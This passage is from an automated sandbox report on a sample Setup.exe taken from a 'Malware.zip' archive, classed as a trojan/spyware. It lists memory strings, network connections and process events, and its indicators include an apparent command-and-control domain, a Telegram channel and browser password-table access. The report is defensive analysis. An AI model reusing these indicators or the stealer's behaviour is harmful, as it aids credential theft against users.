        Source: chrome.exe, 0000000D.00000002.2602828622.00006914012FC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2608382175.0000691401554000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2606155656.0000691401478000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2591961219.0000691400E7C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2606034082.000069140146C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
        Source: chrome.exe, 0000000D.00000002.2597706000.00006914010DC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2608382175.0000691401554000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2606155656.0000691401478000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2606034082.000069140146C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
        Source: chrome.exe, 0000000D.00000002.2596977075.0000691401077000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1696267841&target=OPTIMIZATION_TARGET_OMN
        Source: chrome.exe, 0000000D.00000002.2610358625.00006914016C8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2608382175.0000691401554000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2619869759.000069140203C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2606155656.0000691401478000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2606034082.000069140146C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1728324084&target=OPTIMIZATION_TARGET_OMN
        Source: chrome.exe, 0000000D.00000002.2599701490.00006914011AC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2618913828.0000691401EA4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2615841334.00006914019C0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2606282247.0000691401484000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2616586165.0000691401B55000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2587337302.0000691400C9C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2606155656.0000691401478000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2591961219.0000691400E7C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2606034082.000069140146C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1739808228&target=OPTIMIZATION_TARGET_GEO
        Source: chrome.exe, 0000000D.00000002.2610358625.00006914016C8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2608382175.0000691401554000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2606155656.0000691401478000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2565055950.0000691400190000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2569348114.00006914003E8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2606034082.000069140146C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2600559851.0000691401204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1739808249&target=OPTIMIZATION_TARGET_NOT
        Source: chrome.exe, 0000000D.00000002.2613155763.00006914018AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1739894676&target=OPTIMIZATION_TARGET_CLI
        Source: chrome.exe, 0000000D.00000002.2600559851.0000691401204000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2587903834.0000691400CD4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1901059821.00006914013D8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=240731042075&target=OPTIMIZATION_TARGET_S
        Source: chrome.exe, 0000000D.00000002.2615841334.00006914019C0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2606407071.0000691401490000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2608382175.0000691401554000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2606155656.0000691401478000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2571198790.0000691400511000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2606034082.000069140146C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2564629666.000069140016D000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2609043427.00006914015B0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2606665316.00006914014AD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=5&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
        Source: chrome.exe, 0000000D.00000002.2592245861.0000691400E98000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetModels?key=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
        Source: chrome.exe, 0000000D.00000003.1932288737.0000691400605000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1929526429.0000691401604000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/calendar/
        Source: chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmpString found in binary or memory: https://passwords.google.comSaved
        Source: chrome.exe, 0000000D.00000002.2580424614.00006914009C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://passwords.google/
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://people.googleapis.com/
        Source: chromecache_69.14.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
        Source: chrome.exe, 0000000D.00000002.2543861158.000001B00DD57000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://play.google.com/log?format=json&hasfast=truesyncdata.v1.AsyncDataService/GetAsyncData
        Source: chromecache_67.14.drString found in binary or memory: https://plus.google.com
        Source: chromecache_67.14.drString found in binary or memory: https://plus.googleapis.com
        Source: chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmp, chrome.exe, 0000000D.00000003.1900834316.0000691401298000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2587337302.0000691400C9C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1900834316.000069140129D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/
        Source: chrome.exe, 0000000D.00000002.2576680130.000069140083C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
        Source: chrome.exe, 0000000D.00000002.2576680130.000069140083C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
        Source: Setup.exe, 0000000A.00000003.1867447694.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000A.00000003.1867447694.00000000013DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://restfulzpillow.bet/
        Source: Setup.exe, 0000000A.00000003.1867447694.0000000001402000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000A.00000003.1867447694.00000000013DF000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000A.00000003.1867447694.00000000013EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://restfulzpillow.bet/bWij
        Source: Setup.exe, 0000000A.00000003.1867447694.0000000001402000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://restfulzpillow.bet/bWijt
        Source: chrome.exe, 0000000D.00000002.2569784819.0000691400444000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
        Source: chrome.exe, 0000000D.00000002.2564257407.0000691400138000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyA2KlwBX3mkFo30om9LU
        Source: chrome.exe, 0000000D.00000002.2591961219.0000691400E7C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
        Source: chrome.exe, 0000000D.00000003.1886045999.000069100055C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com
        Source: chrome.exe, 0000000D.00000003.1886045999.000069100055C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comAffiliationsGroupInfoEnabledAutofillEnableEmailHeuristicOutside
        Source: chrome.exe, 0000000D.00000003.1884668031.0000691000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1934181990.0000691401AF4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comb
        Source: chrome.exe, 0000000D.00000002.2590248453.0000691400DB4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2587041056.0000691400C6C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2611075318.0000691401750000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
        Source: chrome.exe, 0000000D.00000002.2570779675.00006914004D4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1968925511.0000691401653000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
        Source: chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmpString found in binary or memory: https://support.google.com/chrome/a/?p=browser_profile_details
        Source: chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6098869
        Source: chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmpString found in binary or memory: https://support.google.com/chrome/answer/96817
        Source: chrome.exe, 0000000D.00000003.1930976582.0000691400590000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome?p=desktop_tab_groups
        Source: chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmpString found in binary or memory: https://support.google.com/chromebook?p=app_intent
        Source: Setup.exe, 0000000A.00000003.1828376706.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000A.00000003.1867447694.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000A.00000003.1828579447.00000000013BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
        Source: Setup.exe, 0000000A.00000003.1828339340.0000000003C6C000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000A.00000003.1828376706.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000A.00000002.2479621096.0000000000FB2000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://t.me/owowoowokk3j4
        Source: Setup.exe, 0000000A.00000002.2479621096.0000000000FB2000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://t.me/owowoowokk3j4L;iw
        Source: chrome.exe, 0000000D.00000002.2591961219.0000691400E7C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://t0.gstatic.com/faviconV2
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/
        Source: Setup.exe, 0000000A.00000003.1828339340.0000000003C6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
        Source: Setup.exe, 0000000A.00000003.1828339340.0000000003C6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.orgPersistent-AuthWWW-AuthenticateVarystel_ssid=35aef6c15fabadbfda_468827385733
        Source: Setup.exe, 0000000A.00000003.1828339340.0000000003C6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.orgX-Frame-OptionsALLOW-FROM
        Source: Louserzation.jsonString found in binary or memory: https://whatif.one/
        Source: chromecache_67.14.drString found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
        Source: Setup.exe, 0000000A.00000003.1871147523.0000000003CCB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2591638099.0000691400E5C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20x
        Source: chrome.exe, 0000000D.00000002.2613801960.0000691401900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
        Source: chrome.exe, 0000000D.00000003.1900763625.0000691401288000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2610261143.00006914016C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
        Source: chrome.exe, 0000000D.00000002.2608382175.0000691401554000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
        Source: chrome.exe, 0000000D.00000002.2613155763.00006914018AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/newtab_promos
        Source: chrome.exe, 0000000D.00000002.2580424614.00006914009C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/#safe
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A28000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/browser-features/
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A28000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/browser-tools/
        Source: chrome.exe, 0000000D.00000003.1934016786.0000691401A7E000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1884668031.0000691000404000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
        Source: chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmpString found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlH&elpManaged
        Source: chrome.exe, 0000000D.00000002.2586377952.0000691400C2C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2599701490.00006914011AC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2589255460.0000691400D54000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/
        Source: Setup.exe, 0000000A.00000003.1871147523.0000000003CCB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2577717429.00006914008A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2573256595.00006914006DC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2573086133.000069140066C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2591638099.0000691400E5C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
        Source: chrome.exe, 0000000D.00000002.2570779675.00006914004D4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1968925511.0000691401653000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
        Source: chrome.exe, 0000000D.00000003.1968925511.0000691401653000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
        Source: chrome.exe, 0000000D.00000003.1934016786.0000691401A7E000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1884668031.0000691000404000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
        Source: chrome.exe, 0000000D.00000002.2569784819.0000691400444000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
        Source: chrome.exe, 0000000D.00000002.2569784819.0000691400444000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit99
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
        Source: chromecache_67.14.drString found in binary or memory: https://www.googleapis.com/auth/plus.me
        Source: chromecache_67.14.drString found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
        Source: chrome.exe, 0000000D.00000003.1885841225.0000691000540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
        Source: chrome.exe, 0000000D.00000003.1884668031.0000691000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1934181990.0000691401AF4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
        Source: chrome.exe, 0000000D.00000003.1885841225.0000691000540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.managerForcedOn_PlusAddressAndroidOpenGmsCoreManagementP
        Source: chrome.exe, 0000000D.00000003.1885841225.0000691000540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.managerPlusAddressOfferCreationIfPasswordFieldIsNotVisib
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/token
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
        Source: chrome.exe, 0000000D.00000002.2613801960.0000691401900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
        Source: chrome.exe, 0000000D.00000002.2613801960.0000691401900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
        Source: chrome.exe, 0000000D.00000002.2577717429.00006914008A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2562777272.0000691400098000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
        Source: chromecache_69.14.drString found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
        Source: chromecache_69.14.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
        Source: chromecache_69.14.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
        Source: chrome.exe, 0000000D.00000003.1967863200.0000691401D64000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
        Source: chrome.exe, 0000000D.00000003.2199550942.0000691401E86000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1967863200.0000691401D64000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
        Source: chrome.exe, 0000000D.00000002.2597469697.00006914010C4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1968925511.0000691401653000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2565055950.0000691400190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.WcyoQrvsWY0.2019.O/rt=j/m=q_dnp
        Source: chrome.exe, 0000000D.00000003.1968009878.0000691401DEC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1968925511.0000691401653000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.L8bgMGq1rcI.L.W.O/m=qmd
        Source: chrome.exe, 0000000D.00000002.2580424614.00006914009C4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2591961219.0000691400E7C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
        Source: chrome.exe, 0000000D.00000002.2596977075.0000691401070000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2580424614.00006914009C4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2607546412.0000691401500000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
        Source: chrome.exe, 0000000D.00000002.2612827514.0000691401890000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2596792163.0000691401060000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
        Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49673
        Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
        Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.16:49701 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.11.150:443 -> 192.168.2.16:49703 version: TLS 1.2
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeProcess Stats: CPU usage > 24%
        Source: classification engineClassification label: mal76.troj.spyw.evad.winZIP@38/14@11/5
        Source: C:\Windows\System32\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6400:120:WilError_03
        Source: C:\Windows\System32\OpenWith.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        Source: chrome.exe, 0000000D.00000002.2583933200.0000691400B24000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT COUNT(metric_value) FROM metrics WHERE metrics.metric_hash = 'CE71BF280B4EB4B5' AND metrics.metric_value > 45;
        Source: chrome.exe, 0000000D.00000002.2595428536.0000691400FC8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '756F6A466879157E';
        Source: chrome.exe, 0000000D.00000002.2592575503.0000691400EB4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2592427896.0000691400EA8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1901059821.00006914013D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2603832530.0000691401360000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT COUNT(DISTINCT CAST((event_timestamp / 1000000 / 60 / 10) AS int)) FROM metrics WHERE metrics.metric_hash = 'AD411B741D0DA012' AND metrics.metric_value > 0;
        Source: chrome.exe, 0000000D.00000002.2581002033.0000691400A07000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
        Source: chrome.exe, 0000000D.00000002.2595428536.0000691400FC8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT COUNT(metric_value) FROM metrics WHERE metrics.metric_hash = 'CE71BF280B4EB4B5' AND metrics.metric_value > 120;
        Source: chrome.exe, 0000000D.00000002.2592575503.0000691400EB4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2592427896.0000691400EA8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1901059821.00006914013D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2603832530.0000691401360000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT COUNT(DISTINCT CAST((event_timestamp / 1000000 / 60 / 10) AS int)) FROM metrics WHERE metrics.metric_hash = 'B4CFE8741404B691' AND metrics.metric_value > 0;
        Source: chrome.exe, 0000000D.00000002.2598629238.0000691401138000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '19E16122849E343B';
        Source: chrome.exe, 0000000D.00000002.2616545270.0000691401ACD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT COUNT(id) FROM metrics WHERE metrics.metric_hash = '64BD7CCE5A95BF00';
        Source: Setup.exe, 0000000A.00000003.1870132284.0000000003CE3000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000A.00000003.1869952058.0000000004055000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: chrome.exe, 0000000D.00000002.2595428536.0000691400FC8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '79964621D357AB88';
        Source: chrome.exe, 0000000D.00000002.2599149994.0000691401178000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '534661B278B11BD';
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile read: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeJump to behavior
        Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
